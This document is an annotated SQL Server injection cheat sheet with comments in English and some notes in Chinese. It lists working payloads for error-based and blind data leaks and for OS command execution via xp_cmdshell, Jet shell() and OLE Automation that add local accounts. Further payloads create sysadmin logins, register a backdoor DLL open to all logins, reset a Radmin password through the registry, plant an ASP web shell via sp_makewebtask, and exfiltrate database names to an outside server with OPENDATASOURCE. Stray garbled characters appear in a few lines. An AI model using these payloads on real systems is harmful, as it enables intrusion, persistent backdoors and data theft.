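-- Check what role the injected session holds. IS_MEMBER('db_owner') returns 1 for a
-- member, 0 otherwise, NULL if the role does not exist. Boolean (blind) form:
and 1=(Select IS_MEMBER('db_owner'))
-- Error-based form: char(124) is '|'; concatenating it around the CAST result and
-- comparing the string to an int forces a conversion error whose message echoes the
-- value. %2B is the URL-encoded '+' -- use a literal '+' when not sending via a URL.
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--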
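-- Check whether the session can read a given database (master here).
-- HAS_DBACCESS returns 1 when accessible, 0 when not, NULL for an unknown name.
and 1= (Select HAS_DBACCESS('master'))
-- Error-based variant: '|' + value + '|' compared to an int raises a conversion
-- error that leaks the value (%2B = URL-encoded '+').
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --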
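-- Leak the current database user through a conversion error ('|'+user+'|' = 0).
-- Choose the variant that matches the injection point; %2B is URL-encoded '+'.
-- Numeric parameter (no quoting needed):
and char(124)%2Buser%2Bchar(124)=0
-- String parameter (close the open quote, re-balance with ''='):
' and char(124)%2Buser%2Bchar(124)=0 and ''='
-- LIKE/search parameter (re-balance with '%'=' so the wildcard quote still closes):
' and char(124)%2Buser%2Bchar(124)=0 and '%'='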
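-- Dump the user name: comparing the nvarchar `user` with an int fails, and the
-- conversion error message includes the user name. Only works when the application
-- returns database error text to the client (error-based injection).
and user>0
' and user>0 and ''='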
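-- Check for membership of the sysadmin server role (sa-equivalent):
-- 1 = member, 0 = not a member, NULL = role name unknown.
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
-- Quote-free variant: 0x730079007300610064006D0069006E00 is N'sysadmin' as UTF-16LE
-- hex, so the role name passes even where single quotes are filtered.
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --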
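-- Fingerprint MSSQL: sysobjects exists on SQL Server (kept as a compatibility view
-- on 2005 and later), so this condition holds true only there.
and exists (select * from sysobjects);--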
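-- Test for stacked queries: if this executes without error, ';' can start a second
-- statement and every EXEC-style payload below becomes usable.
;declare @d int;--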
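-- Restore xp_cmdshell by re-registering the extended procedure from xplog70.dll
-- (SQL Server 2000; requires sysadmin). On 2005+ xp_cmdshell is switched off with
-- sp_configure 'xp_cmdshell' rather than dropped, so this is not the path there.
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--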
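-- Query @@version on a remote SQL Server through OPENROWSET. The database server must
-- be able to reach host:port outbound, the uid/pwd travel in the clear in the
-- connection string, and on 2005+ 'Ad Hoc Distributed Queries' must be enabled.
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')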
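-- -----------------------
-- Command execution
-- -----------------------
-- Step 1: enable Jet sandbox mode. xp_regwrite needs sysadmin and the value is
-- written by the SQL Server service account.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
-- Step 2: run a command through the Jet OLE DB provider. Any readable .mdb works as
-- the "database" (ias.mdb under an NT/2000-style %SystemRoot%); the Jet expression
-- service evaluates shell(), spawning cmd.exe as the service account.
-- The example creates a local account -- substitute the command you actually need.
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')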
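-- Command execution via OLE Automation: instantiate WScript.Shell and call Run.
-- Requires sysadmin; on 2005+ the 'Ole Automation Procedures' option must be on.
-- Runs as the service account; the example adds a local user.
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--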
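-- Direct command execution through xp_cmdshell; creating c:\1111 is a harmless
-- proof that the procedure is enabled and the service account can write to C:\.
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'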
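-- Check whether the xp_cmdshell extended procedure is still registered (xtype 'X').
-- Injected into a numeric GET parameter; the page renders normally only when the
-- count is 1:
--   http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')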
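-- Write a registry value (sysadmin only; performed by the service account).
-- The last two arguments are the value type and the data: REG_DWORD takes a
-- number, REG_SZ a string, REG_BINARY a 0x... literal.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1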
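-- Read a registry value. Winlogon\Userinit is a well-known persistence hook, so
-- inspecting it shows whether anything besides userinit.exe is registered there.
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'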
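-- List a directory: xp_dirtree 'path', depth, include_files (1 = files as well as
-- sub-directories). Reads with the service account's permissions.
exec master..xp_dirtree 'c:\winnt\system32\',1,1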
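-- Back up a database to a file on the server. The file is written by the SQL Server
-- service account, so the path only has to be writable by that account.
backup database pubs to disk = 'c:\123.bak'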
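-- Leak a row count by error: '|'+count+'|' compared to 0 cannot convert and the
-- error message carries the number. D99_Tmp is presumably a scratch table created
-- earlier by the injection tooling -- substitute the table you actually measure.
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--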
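-- Change the sa password (run from a connected SQL client, not blind injection).
-- Passing NULL as the old password is accepted only for sysadmin. sp_password is
-- deprecated; ALTER LOGIN sa WITH PASSWORD = '...' is the 2005+ form. Note this
-- locks the legitimate administrator out -- highly visible and disruptive.
exec sp_password NULL,'新密码','sa'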
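-- Add a login 'test' (password 9530772) and make it sysadmin. sp_addlogin /
-- sp_addsrvrolemember are the SQL 2000 forms (CREATE LOGIN / ALTER SERVER ROLE on
-- newer versions). The heading also mentions deletion but the original gives no
-- statement for it: sp_dropsrvrolemember then sp_droplogin reverse these.
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin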
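-- Unregister the xp_cmdshell extended procedure (sysadmin only) -- a hardening
-- step; see the sp_addextendedproc payload above for how it is put back.
exec sp_dropextendedproc 'xp_cmdshell'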
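-- Register an arbitrary DLL as an extended procedure. The DLL is loaded into the
-- SQL Server process and runs as the service account, and the GRANT lets every
-- login call it -- effectively a persistent backdoor. Remove with
-- sp_dropextendedproc when it is no longer needed.
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public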
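-- Stop or start a Windows service (sysadmin); 'schedule' is the Task Scheduler.
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'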
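-- dbo.xp_subdirs: list only the sub-directories of a path (undocumented, SQL 2000 era).
-- xp_getfiledetails: size, timestamps and attributes of a single file -- useful for
-- confirming a web-root path before writing to it.
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'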
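-- dbo.xp_makecab: pack several files into one .cab (undocumented, SQL 2000 era).
-- Arguments: target cab, compression ('mszip'), verbose flag, then any number of
-- input files separated by commas. Written by the service account; xp_unpackcab
-- below reverses it.
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'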
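-- xp_terminate_process: kill a running process by PID (undocumented). PIDs can be
-- read from Task Manager (View > Select Columns > PID); the 2484 below is only an
-- example and must be replaced.
xp_terminate_process 2484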
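-- xp_unpackcab: extract a .cab -- source cab, destination directory, verbose flag.
xp_unpackcab 'c:\test.cab','c:\temp',1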
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678(该二进制值是原作者给出的 12345678 对应口令值,本文未独立验证)。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234(0xd20400 为小端序 0x04d2 = 1234)。注意:xp_regwrite 需要 sysadmin 权限,写入以 SQL Server 服务账号身份进行。
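-- Staging area on the attacker-controlled SQL Server: a database and two tables
-- that receive data pushed from the target through OPENDATASOURCE (see the insert
-- below, which targets lcx.dbo.ku).
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);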
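-- Exfiltrate the database names: push master.dbo.sysdatabases into table ku on
-- the remote server. Needs outbound connectivity from the target to host:port and
-- (2005+) 'Ad Hoc Distributed Queries'; uid/pwd are sent in the connection string.
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases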
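-- Probe write access to master: creating a table there only succeeds for a
-- privileged login. Drop master..D_TEST afterwards.
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--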
# _9 F. A) o; p9 F3 H. O用 sp_makewebtask直接在web目录里写入一句话马:
# M; t5 r2 y' K' m4 t/ jhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--' c3 V2 z2 \- p
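-- Modify a row. This alters the target's data -- keep the WHERE clause tight and
-- never run an UPDATE without one.
Update films SET kind = 'Dramatic' Where id = 123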
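-- Delete rows. Destructive and irreversible without a backup; never run a DELETE
-- without a WHERE clause.
delete from table_name where Stockid = 3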